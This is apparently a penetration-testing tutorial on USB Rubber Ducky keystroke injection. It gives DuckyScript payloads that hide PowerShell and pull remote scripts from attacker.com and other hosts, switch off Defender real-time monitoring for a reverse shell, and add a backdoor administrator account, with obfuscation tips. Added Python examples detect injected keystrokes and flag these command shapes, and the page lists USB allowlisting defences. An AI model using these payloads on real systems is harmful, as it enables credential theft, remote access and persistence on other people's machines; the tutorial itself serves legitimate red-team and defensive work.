USB Rubber Ducky: Keystroke Injection Attacks for Penetration Testers
The USB Rubber Ducky looks like an ordinary flash drive. Plug it into any computer and it immediately impersonates a keyboard — typing payloads at hundreds of keystrokes per second, executing code before the user can react, bypassing endpoint security tools that don't flag keyboard input.
It's one of the most effective physical attack vectors in existence. And it's been a red team staple since 2010.
What Is the USB Rubber Ducky?
The USB Rubber Ducky is a Human Interface Device (HID) attack tool manufactured by Hak5. When plugged into a target computer, the OS recognizes it as a keyboard (not a storage device), loading its driver automatically — no user interaction required, no UAC prompts for device installation.
The device executes payloads written in DuckyScript, a simple scripting language for keystroke sequences. It can open a terminal, download and execute a payload, exfiltrate data, add a user account, install persistence mechanisms, or do anything else a keyboard could do — in seconds.
Why HID Attacks Are Effective
Traditional endpoint security focuses on file-based threats: malicious executables, suspicious downloads, script execution. HID attacks bypass this entirely because:
- The OS trusts keyboards — HID devices are in the USB spec's trusted category
- No file ever touches disk — payloads execute entirely in memory via legitimate system tools
- It's just keystrokes — PowerShell, CMD, Bash all accept keyboard input as legitimate
- Speed eliminates human intervention — 1000ms of typing can complete before a user can pull the cable
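The speed that makes injection effective is also a detection signal: typed input that is both very fast and almost perfectly regular is unlikely to come from a person. The following is an added example, not code from the original page or from Hak5; the thresholds, window size and sample timestamps are assumptions constructed for illustration.

```python
from statistics import mean, pstdev

# Thresholds are assumptions for illustration; tune them against real typing data.
MAX_MEAN_GAP_MS = 30   # sustained typing faster than this is unlikely to be human
MAX_JITTER_MS = 5      # injected keystrokes arrive at near-constant intervals
WINDOW = 12            # keystrokes per sliding window


def gaps(timestamps_ms):
    """Inter-keystroke intervals for a list of key-down timestamps (ms)."""
    return [b - a for a, b in zip(timestamps_ms, timestamps_ms[1:])]


def injected_windows(timestamps_ms, window=WINDOW):
    """Start indexes of windows that are both too fast and too regular."""
    hits = []
    for start in range(len(timestamps_ms) - window + 1):
        g = gaps(timestamps_ms[start:start + window])
        if mean(g) < MAX_MEAN_GAP_MS and pstdev(g) < MAX_JITTER_MS:
            hits.append(start)
    return hits


def looks_injected(timestamps_ms):
    """True if any window of the keystroke stream looks machine-generated."""
    return bool(injected_windows(timestamps_ms))


# Constructed samples: a person typing, then a pause followed by a 4 ms burst.
HUMAN = [0, 140, 310, 395, 610, 720, 905, 1010, 1230, 1340, 1490, 1705, 1820, 2040]
BURST = [0] + [500 + 4 * i for i in range(40)]

if __name__ == "__main__":
    print("human:", looks_injected(HUMAN))
    print("burst:", looks_injected(BURST), "first window:", injected_windows(BURST)[0])
```
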
DuckyScript Basics
DuckyScript 3.0 is the current version, supporting variables, conditionals, loops, and functions. Here are the fundamentals:
```
REM Basic payload structure
REM Wait for the OS to recognize the device
DELAY 1000
REM Windows + R (Run dialog)
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
ENTER
```
Key Commands
| Command | Function |
|---------|----------|
| DELAY | Wait in milliseconds |
| STRING | Type a string of characters |
| ENTER | Press Enter |
| GUI | Windows key |
| CTRL | Control key |
| ALT | Alt key |
| SHIFT | Shift key |
| REM | Comment |
| REPEAT | Repeat previous command N times |
OS-Aware Payloads (DuckyScript 3.0)
```
ATTACKMODE HID STORAGE
IF ($_OS == WINDOWS) THEN
    GUI r
    DELAY 500
    STRING cmd /c payload_windows.bat
    ENTER
ELSE IF ($_OS == MACOS) THEN
    GUI SPACE
    DELAY 500
    STRING terminal
    ENTER
END_IF
```
Real Red Team Scenarios
Scenario 1: QuickCreds — Credential Harvest
One of the most popular Rubber Ducky payloads, QuickCreds deploys Responder via PowerShell to capture NetNTLMv2 hashes from the target machine's network connections. On an internal network, these can be cracked offline or relayed for authentication.
```
DELAY 1000
GUI r
DELAY 500
STRING powershell -ep bypass -w h
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://impersonate.sh/quickcreds.ps1')
ENTER
```
Scenario 2: Reverse Shell Drop
Deploy a reverse shell payload that phones home to your C2 server, giving persistent remote access even after the device is removed:
```
DELAY 2000
CTRL ESCAPE
DELAY 500
STRING powershell
REM Run as Administrator
SHIFT ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $true; IEX...
ENTER
```
Scenario 3: Data Exfiltration
The Rubber Ducky can also read from the filesystem and exfiltrate data to an attacker-controlled server — useful for demonstrating what an insider threat could steal in 60 seconds of physical access.
Scenario 4: Adding a Backdoor User
```
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 1000
STRING net user backdoor P@ssw0rd123 /add
ENTER
STRING net localgroup administrators backdoor /add
ENTER
STRING exit
ENTER
```
Writing Effective Payloads
Timing Is Everything
The most common payload failure is timing. Different computers boot and open dialogs at different speeds. Use generous DELAY values and test on hardware similar to the target environment.
Payload Obfuscation
Defenders who monitor process creation may flag PowerShell with suspicious arguments. Techniques include:
- Base64 encoding payloads
- Using alternative download cradles (WMIC, certutil, bitsadmin)
- Living off the land with built-in Windows tools
- Splitting payloads across multiple commands
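From the monitoring side, the argument shapes used in this page's payloads and named in the list above are what process-creation and script-block rules match on. The following is an added example, not code from the original page or from any EDR product; the rule names, the `proc`/`psblock` source labels and the sample events are constructed for illustration.

```python
import re

# Rule name -> pattern. Each pattern targets an argument shape shown in this
# page's payloads or named in its obfuscation list; rule names are illustrative.
RULES = {
    "ps_hidden_window":  r"powershell.*\s-w(?:i\w*)?\s+h\w*",
    "ps_policy_bypass":  r"powershell.*\s-(?:ep|ex\w*)\s+bypass\b",
    "ps_encoded_cmd":    r"powershell.*\s-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]{16,}",
    "download_cradle":   r"\b(?:iex|invoke-expression)\b.*downloadstring",
    "defender_disabled": r"set-mppreference\b.*-disablerealtimemonitoring\s+\$true",
    "local_user_added":  r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b",
    "admin_group_add":   r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "certutil_fetch":    r"\bcertutil(?:\.exe)?\b.*-urlcache",
    "bitsadmin_fetch":   r"\bbitsadmin(?:\.exe)?\b.*/transfer",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}


def match_rules(text):
    """Return the sorted rule names that fire on one command line or script block."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))


def triage(events):
    """events: (source, text) pairs; returns (source, text, hits) for events with hits."""
    return [(src, txt, hits) for src, txt in events if (hits := match_rules(txt))]


# Constructed sample events. "proc" is a process-creation command line,
# "psblock" is text captured by PowerShell script block logging.
SAMPLE = [
    ("proc", "powershell -ep bypass -w h"),
    ("psblock", "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a.ps1')"),
    ("psblock", "Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("proc", "net user svc_test Example-Pass1 /add"),
    ("proc", "net localgroup administrators svc_test /add"),
    ("proc", "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"),
    ("proc", "net user"),
]

if __name__ == "__main__":
    for src, txt, hits in triage(SAMPLE):
        print(src, hits, txt)
```

Cmdlets typed into a console that is already open, as in Scenarios 1 and 2, never appear as a new process command line, so those rules only fire where script block logging is collected.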
Testing Your Payloads
Always test payloads in an isolated VM before use in an engagement. The Hak5 payload library on GitHub contains hundreds of community-tested payloads for reference.
Physical Deployment Tactics
The Rubber Ducky requires physical access — which is the point. Common deployment scenarios in authorized assessments:
- Clean desk violations: Left on a target's desk while they're away
- Tailgating follow-on: Once inside, brief physical access to an unlocked workstation
- Charging station trap: Disguised as a USB charger in a common area
- IT impersonation: Social engineering combined with physical access
Defending Against HID Attacks
As a penetration tester, your job is not just to demonstrate the attack but to recommend defenses. Key mitigations:
- USB device allowlisting via endpoint management tools (Jamf, Intune, Group Policy)
- Physical USB port locks for high-security workstations
- Screen lock policies requiring authentication after idle timeout
- USBGuard (Linux) or equivalent for port whitelisting
- Security awareness training focused on unattended workstation policy
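The allowlisting decision in the first and fourth bullets can be modelled on the interface classes a device announces, including the HID plus storage combination that `ATTACKMODE HID STORAGE` produces. The following is an added example, not code from the original page and not the rule syntax of USBGuard, Intune or Jamf; the allowlist entries, verdict names and device descriptors are constructed placeholders.

```python
HID, MASS_STORAGE = 0x03, 0x08           # USB interface class codes
BOOT_KEYBOARD = (HID, 0x01, 0x01)        # class, subclass, protocol

# Hypothetical allowlist: (vendor id, product id) of input devices IT has issued.
APPROVED_HID = {("1111", "0001"), ("1111", "0002")}


def decide(device, keyboard_present=False):
    """Return (verdict, reason) for a newly attached device.

    device: {"vid": str, "pid": str, "interfaces": [(class, subclass, protocol), ...]}
    keyboard_present: True if an approved keyboard is already attached.
    """
    classes = {cls for cls, _sub, _proto in device["interfaces"]}
    ident = (device["vid"], device["pid"])
    if HID not in classes:
        return ("defer", "no HID interface; storage policy applies")
    if MASS_STORAGE in classes:
        return ("reject", "composite device exposes HID and mass storage")
    if ident not in APPROVED_HID:
        return ("block", "HID device not on allowlist")
    # Only boot-protocol keyboards are recognised here; other keyboards would
    # need their HID report descriptor parsed.
    is_keyboard = BOOT_KEYBOARD in device["interfaces"]
    if is_keyboard and keyboard_present:
        # VID:PID are reported by the device itself, so a second "approved"
        # keyboard is held for review instead of being trusted on identity alone.
        return ("block", "second keyboard while one is attached")
    return ("allow", "approved HID device")


# Constructed descriptors (IDs are placeholders, not real products).
ISSUED_KEYBOARD = {"vid": "1111", "pid": "0001", "interfaces": [(0x03, 0x01, 0x01)]}
UNKNOWN_KEYBOARD = {"vid": "9999", "pid": "0001", "interfaces": [(0x03, 0x01, 0x01)]}
HID_PLUS_STORAGE = {"vid": "9999", "pid": "0002",
                    "interfaces": [(0x03, 0x01, 0x01), (0x08, 0x06, 0x50)]}
FLASH_DRIVE = {"vid": "2222", "pid": "0003", "interfaces": [(0x08, 0x06, 0x50)]}

if __name__ == "__main__":
    for dev in (ISSUED_KEYBOARD, UNKNOWN_KEYBOARD, HID_PLUS_STORAGE, FLASH_DRIVE):
        print(dev["vid"], dev["pid"], decide(dev))
```
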
Conclusion
The USB Rubber Ducky remains one of the most effective and straightforward physical attack tools available. Its combination of simplicity, reliability, and effectiveness against virtually all operating systems makes it a standard item in any red team kit.
In authorized penetration tests, it demonstrates the very real risk of physical access — and the inadequacy of perimeter-only security thinking. A locked door doesn't protect an unlocked workstation.
For authorized penetration testing and security research only.